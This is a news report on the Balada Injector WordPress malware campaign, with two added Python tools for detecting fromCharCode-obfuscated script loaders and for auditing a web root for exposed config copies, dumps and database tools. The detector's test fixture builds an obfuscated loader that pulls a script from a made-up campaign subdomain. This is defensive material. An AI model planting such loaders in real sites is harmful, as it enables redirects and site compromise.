A malicious campaign known as Balada Injector has infected over one million WordPress websites over the years.
According to the researchers, the campaign exploits all known and recently disclosed theme and plugin vulnerabilities to inject a Linux backdoor into WordPress sites. This gives the attackers varying levels of access, and in many cases the exploited vulnerabilities also let them obtain sensitive information about the compromised websites.
Since 2017, the campaign has consistently ranked among the top three infections detected and cleaned from affected sites. It launches fresh waves of attacks using newly registered domains and variations of previously used malware. In the most recent wave, the campaign exploited a high-severity vulnerability in Elementor Pro, a WordPress plugin used by 11 million websites.
Researchers say this campaign is easily identified by its preference for String.fromCharCode obfuscation, its use of newly registered domain names hosting malicious scripts on random subdomains, and its redirects to various scam sites, including fake tech support, fraudulent lottery wins, and push-notification scams.
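The two indicators above (fromCharCode obfuscation and script loaders pointing at a throwaway subdomain) can be checked statically, without evaluating the injected JavaScript. The following is an added example, not Sucuri's code or a captured Balada payload: the page fragment, the subdomain `x7q2k.sometimesfree.biz` and the site host `example-site.test` are constructed for the illustration.

```python
import re
from urllib.parse import urlparse

# Matches String.fromCharCode(104,116,...) with a purely numeric argument list.
# Variants such as String["fromCharCode"] or computed arguments are not covered.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9\s,]+?)\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def _charcodes(text):
    """Encode text as the comma-separated argument list String.fromCharCode expects."""
    return ",".join(str(ord(ch)) for ch in text)


# Constructed sample page fragment. The loader URL uses an assumed, made-up
# subdomain on one of the domain names the article lists; it is not a real payload.
SAMPLE_HTML = (
    "<p>Welcome</p>\n"
    '<script>var d=document,s=d.createElement("script");'
    "s.src=String.fromCharCode(" + _charcodes("https://x7q2k.sometimesfree.biz/main.js") + ");"
    "d.head.appendChild(s);</script>\n"
    '<script src="https://example-site.test/wp-includes/js/jquery.js"></script>\n'
)


def decode_fromcharcode(text):
    """Statically decode every String.fromCharCode(...) call found in text (no eval)."""
    decoded = []
    for match in FROMCHARCODE_RE.finditer(text):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def foreign_script_hosts(text, site_hosts):
    """Hosts referenced by plain or decoded URLs that are not the site's own."""
    candidates = URL_RE.findall(text)
    for piece in decode_fromcharcode(text):
        candidates.extend(URL_RE.findall(piece))
    hosts = set()
    for url in candidates:
        host = urlparse(url).hostname
        if host and host not in site_hosts:
            hosts.add(host)
    return hosts


def scan(text, site_hosts):
    """Summarise both indicators for one page or file."""
    decoded = decode_fromcharcode(text)
    return {
        "fromcharcode_calls": len(decoded),
        "decoded": decoded,
        "foreign_hosts": sorted(foreign_script_hosts(text, site_hosts)),
    }


if __name__ == "__main__":
    print(scan(SAMPLE_HTML, {"example-site.test"}))
```

Run `scan()` over rendered pages, theme files and the `post_content` of database rows; a fromCharCode call whose decoded string is a URL on a host the site does not own is the pattern to escalate. A random-looking first label such as `x7q2k` is a hint, not proof, so confirm the registration date of the parent domain out of band before acting on it.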
The threat actors use the period between waves to develop new attack routines, usually by gathering and testing new vulnerabilities. Each wave uses a new, freshly registered domain name that combines random English words, such as sometimesfree[.]biz and destinyfernandi[.]com.
Balada Injector has used over a hundred different domain names and a wide range of attack methods, including site URL hacks, HTML injections, database injections, and arbitrary file injections, with attacks often involving multiple infections on the same site.
Balada's scripts aim to steal the database credentials in wp-config.php, which could allow continued access even if the site owner patches the previously exploited vulnerabilities and removes the backdoor files; a cleanup that does not also rotate the database password and the authentication salts in wp-config.php leaves that door open. To evade detection, the attackers frequently altered the list of targeted files, adding "new elements" while removing "underperforming ones." If a site is not yet compromised, the attackers use various tricks to obtain the contents of wp-config.php; if it is already compromised, they read the file to save the credentials for future use.
The campaign also attempts to access arbitrary site files, including backup archives, databases, access logs and debug information, while hunting for database tools such as Adminer and phpMyAdmin. The malware eventually creates fake WordPress admin users, steals data from the underlying hosts, and leaves backdoors for continued access.
This research was documented by researchers at Sucuri.
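A triage pass a site owner can run against a document root for the artifacts the last two paragraphs describe: stray copies of wp-config.php, backup archives and database dumps, debug and access logs, and Adminer or phpMyAdmin installs. This is an added example, not Sucuri's code; the filename patterns, the category names and the sample directory tree are assumptions built for the illustration.

```python
import os
import re
import shutil
import stat
import tempfile

# Assumed patterns, built from the artifact types the article names. Extend them
# for your hosting layout; a miss here is a false negative, not proof of cleanliness.
CONFIG_COPY_RE = re.compile(r"^(wp-config\.php[.~_-].*|\.wp-config\.php\.swp|wp-config\.(bak|old|txt))$", re.I)
DUMP_RE = re.compile(r"\.(zip|tar|tgz|tar\.gz|sql|sql\.gz|7z)$", re.I)
LOG_RE = re.compile(r"^(debug\.log|error_log|access[._-]?log|\.env)$", re.I)
TOOL_DIRS = {"adminer", "phpmyadmin", "pma", "myadmin"}
TOOL_FILE_RE = re.compile(r"^adminer[\w.-]*\.php$", re.I)


def classify(name, is_dir):
    """Return a finding category for one directory entry, or None if it looks benign."""
    if is_dir:
        return "db admin tool" if name.lower() in TOOL_DIRS else None
    if TOOL_FILE_RE.match(name):
        return "db admin tool"
    if CONFIG_COPY_RE.match(name):
        return "config copy"
    if DUMP_RE.search(name):
        return "backup/dump"
    if LOG_RE.match(name):
        return "log/debug file"
    return None


def _rel(rel_dir, name):
    return name if rel_dir == "." else f"{rel_dir}/{name}".replace(os.sep, "/")


def scan_webroot(root):
    """Walk a WordPress document root and list entries an attacker would go looking for."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic traversal order
        rel_dir = os.path.relpath(dirpath, root)
        for d in dirnames:
            category = classify(d, True)
            if category:
                findings.append((_rel(rel_dir, d), category))
        for f in sorted(filenames):
            full = os.path.join(dirpath, f)
            # The live config readable by any local user is a problem on shared hosts.
            if f == "wp-config.php" and os.stat(full).st_mode & stat.S_IROTH:
                findings.append((_rel(rel_dir, f), "world-readable config"))
            category = classify(f, False)
            if category:
                findings.append((_rel(rel_dir, f), category))
    return sorted(findings)


def build_sample_webroot():
    """Create a throwaway tree (constructed sample data) mimicking a neglected site."""
    root = tempfile.mkdtemp(prefix="wproot-")
    for rel in [
        "index.php", "wp-config.php", "wp-config.php.bak", "db.sql",
        "adminer-4.8.1.php", "backups/site-backup.zip", "phpmyadmin/index.php",
        "wp-content/debug.log", "wp-includes/js/jquery.js",
    ]:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // placeholder\n")
    os.chmod(os.path.join(root, "wp-config.php"), 0o644)  # common default permission
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    try:
        for path, category in scan_webroot(sample):
            print(f"{category:22} {path}")
    finally:
        shutil.rmtree(sample)
```

Treat every hit as something to move out of the document root or delete, not merely to rename, since the attackers' target list is revised between waves. The fake admin users the article mentions are a separate check against the database rather than the filesystem; `wp user list --role=administrator` from WP-CLI is the quickest way to review them.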